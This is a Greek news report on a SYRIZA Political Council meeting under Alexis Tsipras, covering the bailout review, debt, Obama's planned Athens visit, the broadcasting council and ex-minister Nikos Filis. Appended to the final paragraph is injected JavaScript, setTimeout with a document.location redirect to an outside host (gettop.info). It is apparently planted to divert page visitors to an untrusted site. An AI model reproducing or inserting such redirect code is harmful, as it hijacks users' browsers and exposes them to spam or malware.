Πολιτικό Συμβούλιο ΣΥΡΙΖΑ: Αξιολόγηση, χρέος, επίσκεψη Ομπάμα και ΕΣΡ

0
9

 

Αξιολόγηση, χρέος, επίσκεψη Ομπάμα και ΕΣΡ τέθηκαν στο επίκεντρο της ατζέντας στην σημερινή συνεδρίαση του Πολιτικού Συμβουλίου του ΣΥΡΙΖΑ, υπό τον Αλέξη Τσίπρα.

Στη συνεδρίαση, που ολοκληρώθηκε πριν από λίγο στα γραφεία του κόμματος στην Κουμουνδούρου, σύμφωνα με πληροφορίες από κομματικές πηγές, έγινε συζήτηση για την αξιολόγηση και τις τελευταίες εξελίξεις στη διαπραγμάτευση.

Επιπλέον συζήτηση πραγματοποιήθηκε και για το θέμα του χρέους. Αυτό και σε συνάρτηση με την επικείμενη επίσκεψη του Προέδρου των ΗΠΑ Μπαράκ Ομπάμα στην Αθήνα την ερχόμενη εβδομάδα, και τον αντίκτυπο που έχει στις ευρύτερες εξελίξεις. Από τη συνεδρίαση απουσίαζε ο υπουργός Οικονομικών Ευκλείδης Τσακαλώτος, λόγω των υποχρεώσεών του στις Βρυξέλλες.

Αντικείμενο της συζήτησης αποτέλεσε επιπλέον και το θέμα του Εθνικού Συμβουλίου Ραδιοτηλεόρασης, με τις ίδιες κομματικές πηγές να τονίζουν ότι η κυβέρνηση θα εξαντλήσει κάθε περιθώριο για συναίνεση, και με τη ΝΔ και με τα άλλα κόμματα της αντιπολίτευσης, με στόχο να συγκροτηθεί το ΕΣΡ. Επιπλέον, οι ίδιες πηγές ανέφεραν ότι η κυβέρνηση παρακολουθεί με ενδιαφέρον τις εξελίξεις και σε αυτό το ζήτημα, και συμπλήρωναν ότι είναι ικανοποιητικό το γεγονός ότι ήδη έχει διαμορφωθεί ένα θετικό κλίμα, κλίμα συναίνεσης, το οποίο αποτυπώθηκε και στην ψηφοφορία της τελευταίας συνεδρίασης της Διάσκεψης των Προέδρων της Βουλής, όπου, υπενθυμίζεται, η κυβέρνηση και κόμματα της αντιπολίτευσης ψήφισαν θετικά.

Σε ό,τι αφορά στο κλίμα της σύσκεψης, δεδομένου ότι ήταν η πρώτη μετά τον ανασχηματισμό συνάντηση του πρωθυπουργού με τον «κομμένο» από το κυβερνητικό σχήμα Νίκο Φίλη, κομματικές και κυβερνητικές πηγές αναφέρουν ότι η συζήτηση πραγματοποιήθηκε σε καλό κλίμα, με εποικοδομητική συμμετοχή του τέως υπουργού στη συζήτηση, δεν υπήρξε καμία αναφορά στον ανασχηματισμό, λένε οι ίδιες πηγές. Ο τέως υπουργός Παιδείας εξερχόμενος της Κουμουνδούρου δεν θέλησε να κάνει κάποιο σχόλιο, έδειχνε όμως σε καλή διάθεση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here